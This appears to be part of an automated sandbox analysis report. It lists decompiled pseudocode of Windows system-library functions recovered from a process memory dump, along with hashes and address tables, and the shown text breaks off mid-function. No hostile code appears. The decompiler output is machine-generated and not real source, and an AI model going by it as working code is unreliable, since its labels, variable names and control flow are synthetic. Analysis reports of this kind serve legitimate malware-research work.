0x00000000
0x04ab4d63
0x04ab4d69
0x00000000
0x00000000
0x04ab4d6b
0x04ab4d6e
0x04ab4d74
0x04ab4d76
0x04ab4d7c
0x04ab4d7e
0x04ab4d84
0x04ab4d89
0x04ab4d8c
0x04ab4d8d
0x04ab4d92
0x04ab4d95
0x04ab4d96
0x04ab4d98
0x04ab4d9a
0x04ab4d9f
0x04ab4da4
0x04ab4da6
0x04ab4da8
0x04ab4daf
0x04ab4db1
0x04ab4db1
0x04ab4daf
0x04ab4da6
0x04ab4d84
0x04ab4d7c
0x00000000
0x04ab4d74
0x04a704d6
0x04ab4de1
0x04a704dc
0x04a704dc
0x04a704dc
0x04a704e4
0x04ab4deb
0x04ab4df1
0x04ab4df8
0x04ab4dfe
0x04ab4e03
0x04ab4e05
0x04ab4e17
0x04ab4e07
0x04ab4e10
0x04ab4e10
0x04ab4e1c
0x04ab4e1f
0x04ab4e35
0x04ab4e35
0x04ab4e1f
0x04ab4df8
0x04a704f1
0x04a704fa
0x04ab4e3f
0x04ab4e47
0x04ab4e5b
0x04ab4e61
0x04ab4e67
0x04ab4e69
0x04ab4e71
0x04ab4e73
0x04a70500
0x04a70500
0x04a70500
0x04a704fa
0x04a70508
0x04a7051d
0x04a7051d
0x04a7051f
0x04a70524
0x00000000
0x04a70524
0x04a70515
0x04a70517
0x04ab4e7a
0x04ab4e7c
0x00000000
0x00000000
0x04ab4e85
0x00000000
0x04ab4e85
0x00000000
0x04a70517

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6eef43018c21790fe8895045b1e673215154a64334d3c9729a70a5259e8cd701
Instruction ID: 1c2038566f38cbecb350a59e8c8218d5601cd3f084df1cb2394e0465dbc8ad3c
Opcode Fuzzy Hash: 6eef43018c21790fe8895045b1e673215154a64334d3c9729a70a5259e8cd701
Instruction Fuzzy Hash: F291F471E04214AFEB319B68CD44BAD7BB8EB09728F054265E951AB2D3E774BD00C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 04A4C600, Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E04A4C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x4b3d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E04A56D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E04A8B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x4b37b9c; // 0x0
					_t74 = L04A64620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E04A89650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L04A677F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E04A8F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E04A813C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L04A677F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E04A89650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x04a4c608
0x04a4c615
0x04a4c625
0x04a4c62d
0x04a4c635
0x04a4c640
0x04a4c680
0x04a4c687
0x04a4c688
0x04a4c689
0x04a4c694
0x04a4c694
0x04a4c642
0x04a4c64a
0x04a4c697
0x04ab7a25
0x04ab7a2b
0x04ab7a2e
0x04ab7a30
0x04ab7bea
0x04ab7bea
0x00000000
0x04ab7bea
0x04ab7a36
0x04ab7a43
0x04ab7a48
0x04ab7a4c
0x04ab7a4e
0x00000000
0x00000000
0x04ab7a58
0x04ab7a5a
0x04ab7a5b
0x04ab7a5c
0x04ab7a5d
0x04ab7a63
0x04ab7a64
0x04ab7a6a
0x04ab7a6c
0x04ab7a6e
0x04ab79cb
0x04ab79cb
0x04ab79ce
0x04ab79d0
0x04ab7a98
0x04ab7a9b
0x04ab7a9b
0x04ab7a9e
0x04ab7aa1
0x04ab7bbe
0x04ab7bbe
0x04ab7bc0
0x04ab7be0
0x04ab7be0
0x04ab7a01
0x04ab7a01
0x04ab7a05
0x04ab7a07
0x04ab7a15
0x04ab7a15
0x04ab7a1a
0x00000000
0x04ab7a1a
0x04ab7bc2
0x04ab7bc6
0x04ab7bc9
0x04ab7bcd
0x04ab7bcf
0x04ab79e6
0x04ab79e6
0x04ab79eb
0x04ab79eb
0x04ab79ef
0x04ab79f1
0x00000000
0x00000000
0x04ab79f3
0x04ab79f5
0x04ab79ff
0x04ab79ff
0x00000000
0x04ab79ff
0x04ab79f7
0x04ab79fd
0x00000000
0x00000000
0x00000000
0x04ab79fd
0x04ab7bd5
0x04ab7bd8
0x00000000
0x00000000
0x04ab7ba9
0x04ab7bac
0x04ab7bb0
0x04ab7bb1
0x04ab7bb1
0x04ab7bb6
0x00000000
0x04ab7bb6
0x04ab7aa7
0x04ab7aaa
0x00000000
0x00000000
0x04ab7ab2
0x04ab7ab3
0x04ab7ab5
0x04ab7aec
0x04ab7aef
0x04ab7b25
0x04ab7b28
0x04ab7b62
0x04ab7b64
0x04ab7b8f
0x04ab7b92
0x04ab7b96
0x04ab7b98
0x00000000
0x00000000
0x04ab7b9e
0x04ab7b9f
0x04ab7ba3
0x00000000
0x04ab7ba3
0x04ab7b66
0x04ab7b68
0x04ab7ae2
0x04ab7ae2
0x00000000
0x04ab7ae2
0x04ab7b6e
0x04ab7b72
0x04ab7b75
0x04ab7b81
0x04ab7b85
0x04ab7b87
0x00000000
0x00000000
0x04ab7b31
0x04ab7b34
0x04ab7b3c
0x04ab7b45
0x04ab7b46
0x04ab7b4f
0x04ab7b51
0x04ab7b57
0x04ab7b59
0x04ab7b59
0x00000000
0x04ab7b59
0x04ab7b77
0x00000000
0x04ab7b77
0x04ab7b2a
0x00000000
0x04ab7b2a
0x04ab7af1
0x04ab7af3
0x00000000
0x00000000
0x04ab7afb
0x04ab7afc
0x04ab7afe
0x00000000
0x00000000
0x04ab7b00
0x04ab7b03
0x00000000
0x00000000
0x04ab7b05
0x04ab7b09
0x04ab7b0d
0x04ab7b0f
0x00000000
0x00000000
0x04ab7b18
0x04ab7b1d
0x00000000
0x04ab7b1d
0x04ab7ab7
0x04ab7ab9
0x00000000
0x00000000
0x04ab7abf
0x04ab7ac1
0x00000000
0x00000000
0x04ab7ac3
0x04ab7ac6
0x00000000
0x00000000
0x04ab7ac8
0x04ab7acc
0x04ab7ad0
0x04ab7ad2
0x00000000
0x00000000
0x04ab7adb
0x00000000
0x04ab7adb
0x04ab79d6
0x04ab79d9
0x04ab79dc
0x04ab7a91
0x04ab7a94
0x00000000
0x04ab7a94
0x04ab79e2
0x00000000
0x04ab79e2
0x04ab7a74
0x04ab7a7a
0x00000000
0x00000000
0x04ab7a8a
0x04ab7a21
0x04ab7a21
0x00000000
0x04ab7a21
0x04a4c650
0x04a4c651
0x04a4c656
0x04a4c65c
0x04a4c65d
0x04a4c663
0x04a4c664
0x04a4c66a
0x04a4c66e
0x04ab79c5
0x04ab79c7
0x00000000
0x04ab79c7
0x04a4c67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 686f1d84401c67b1eb8dbd50e9435f00fd7ad5840d2de318d496e14f5b619e6e
Instruction ID: 899c4687d5abd031b5ea73e4745365be37727e8daf2db9cb70c23c3bdbc6911a
Opcode Fuzzy Hash: 686f1d84401c67b1eb8dbd50e9435f00fd7ad5840d2de318d496e14f5b619e6e
Instruction Fuzzy Hash: A4817C796042019FDB65CF14C880ABAB7ACEBC4354F55486EED869B242E370FD45CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 04AC6DC9, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E04AC6DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L04A64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E04AC6B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E04A67D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E04A89AE0();
					_t87 = L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E04AC795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E04AC795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E04AC795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E04AC795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L04A64620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E04AC6B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E04AC6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E04AC6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E04AC6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E04A67D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E04A89AE0();
								L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L04A62400( &_v36);
							if(_v24 >= 0) {
								_t87 = L04A62400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L04A62400( &_v52);
							}
							if(_v28 >= 0) {
								return L04A62400( &_v60);
							}
						}
					}
				}
				return _t87;
			}

0x04ac6dd4
0x04ac6dde
0x04ac6de1
0x04ac6de3
0x04ac6de6
0x04ac6de9
0x04ac6dec
0x04ac6def
0x04ac6df2
0x04ac6df5
0x04ac6dfe
0x04ac6e04
0x04ac6e09
0x04ac6e0d
0x04ac6e18
0x04ac6e1b
0x04ac6e22
0x04ac6e2d
0x04ac6e30
0x04ac6e36
0x04ac6e42
0x04ac6e4d
0x04ac6e50
0x04ac6e55
0x04ac6e5c
0x04ac6e6e
0x04ac6e5e
0x04ac6e67
0x04ac6e67
0x04ac6e73
0x04ac6e74
0x04ac6e77
0x04ac6e7c
0x04ac6e7d
0x04ac6e8e
0x04ac6e93
0x04ac6e9c
0x04ac6ea8
0x04ac6eab
0x04ac6eac
0x04ac6eb3
0x04ac6ecd
0x04ac6edc
0x04ac6ee2
0x04ac6ee5
0x04ac6ef2
0x04ac6efb
0x04ac6f01
0x04ac6f06
0x04ac6f0b
0x04ac6f11
0x04ac6f1a
0x04ac6f22
0x04ac6f26
0x04ac6f26
0x04ac6f33
0x04ac6f41
0x04ac6f44
0x04ac6f47
0x04ac6f54
0x04ac6f65
0x04ac6f77
0x04ac6f7c
0x04ac6f82
0x04ac6f91
0x04ac6f99
0x04ac6fa3
0x04ac6fae
0x04ac6fae
0x04ac6fba
0x04ac6fbb
0x04ac6fbc
0x04ac6fc1
0x04ac6fc2
0x04ac6fd3
0x04ac6fd8
0x04ac6fd8
0x04ac6fdf
0x04ac6fe8
0x04ac6fee
0x04ac6fee
0x04ac6ff5
0x04ac6ffb
0x04ac6ffb
0x04ac7004
0x00000000
0x04ac700a
0x04ac7004
0x04ac6eb3
0x04ac6e9c
0x04ac7015

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: 76eee282f5549d294c67f3f12ba69a5da37a4fe68e96ad119030941574bf0869
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: 83717C76A00209EFDB50EFA4CA84AEEBBB9FF48714F104569E505E7250DB34FA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04ADB8D0, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E04ADB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x4b37b9c; // 0x0
				_t124 = L04A64620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E04A89800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E04A895B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E04A895D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L04A677F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E04A89910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E04A895D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x4b37b9c; // 0x0
									_t92 = L04A64620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E04A89910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E04A4A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E04ADE7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E04ADE7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E04A895B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x04adb8d9
0x04adb8e4
0x00000000
0x04adb8e6
0x04adb8f3
0x04adb8f5
0x04adb8f5
0x04adb8f8
0x04adb920
0x04adb924
0x04adb936
0x04adb939
0x04adb93d
0x04adb948
0x04adb9a0
0x04adb9a0
0x04adb9a4
0x04adb9bf
0x04adb9c4
0x04adb9c6
0x04adb9cd
0x04adb9d1
0x04adbad4
0x04adbad8
0x04adbada
0x04adbadc
0x04adbadc
0x04adbadf
0x04adbae0
0x04adbae2
0x04adbae4
0x04adbaec
0x04adbaee
0x04adbaf0
0x04adbaf0
0x04adbaec
0x04adbafb
0x04adbafc
0x04adbafe
0x04adbb01
0x04adbb01
0x00000000
0x04adbb06
0x04adb9d7
0x04adb9db
0x04adb9db
0x04adb9de
0x04adb9de
0x04adb9e4
0x04adb9e7
0x04adb9ea
0x04adb9ec
0x04adb9ef
0x04adb9f3
0x04adba1b
0x04adba1b
0x04adba23
0x04adba24
0x04adba27
0x04adba2a
0x04adba2b
0x04adba2e
0x04adba30
0x04adba37
0x04adba3f
0x04adba9c
0x04adbaa2
0x04adbb13
0x04adbb15
0x04adbaae
0x04adbaae
0x04adbab3
0x04adbab5
0x04adbaba
0x04adbac8
0x04adbac8
0x04adbaba
0x04adbacd
0x04adbacf
0x00000000
0x04adbacf
0x04adbb1a
0x00000000
0x04adbb1c
0x04adbaa7
0x04adbb11
0x00000000
0x04adbb11
0x04adbaa9
0x00000000
0x00000000
0x00000000
0x00000000
0x04adba41
0x04adba41
0x04adba41
0x04adba58
0x04adba5d
0x04adba62
0x00000000
0x00000000
0x04adba64
0x04adba67
0x04adba68
0x04adba69
0x04adba6c
0x04adba6f
0x04adba71
0x04adba78
0x04adba80
0x00000000
0x00000000
0x04adba90
0x04adba90
0x04adba97
0x00000000
0x04adba97
0x04adb9f5
0x04adb9f7
0x04adb9f7
0x04adb9fa
0x04adba03
0x04adba07
0x04adba0c
0x04adba10
0x04adba17
0x00000000
0x04adb9f7
0x04adb9a6
0x04adb9a8
0x04adb9af
0x04adb9b3
0x00000000
0x00000000
0x04adb9b9
0x00000000
0x04adb9b9
0x04adb94d
0x04adb98f
0x04adb995
0x04adb999
0x04adb960
0x04adb967
0x04adb968
0x04adb96a
0x00000000
0x04adb96a
0x04adb99b
0x04adb99e
0x00000000
0x00000000
0x00000000
0x04adb99e
0x04adb951
0x04adb954
0x04adb95a
0x04adb95e
0x04adb972
0x04adb979
0x04adb97d
0x04adb97f
0x04adb980
0x04adb982
0x04adb984
0x00000000
0x04adb984
0x00000000
0x04adb926
0x00000000
0x04adb926

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08efa83e6e04e0bde948d5f4a1a028ba267af07486f3bb6ff4cb80b4d076a358
Instruction ID: 7981e372d7aa9e2b79962c1dd213f3d7791f0643ffb8c4cc6696b7bdd0d16a1a
Opcode Fuzzy Hash: 08efa83e6e04e0bde948d5f4a1a028ba267af07486f3bb6ff4cb80b4d076a358
Instruction Fuzzy Hash: EE710F72200B01AFE731DF25C944F66BBB5EF44B24F124528E6578B6A0EB74F940CB60

Uniqueness

Uniqueness Score: -1.00%

Function 04A452A5, Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E04A452A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E04A5EEF0(0x4b379a0);
					_t104 =  *0x4b38210; // 0xdc2d40
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E04A5EB70(_t93, 0x4b379a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
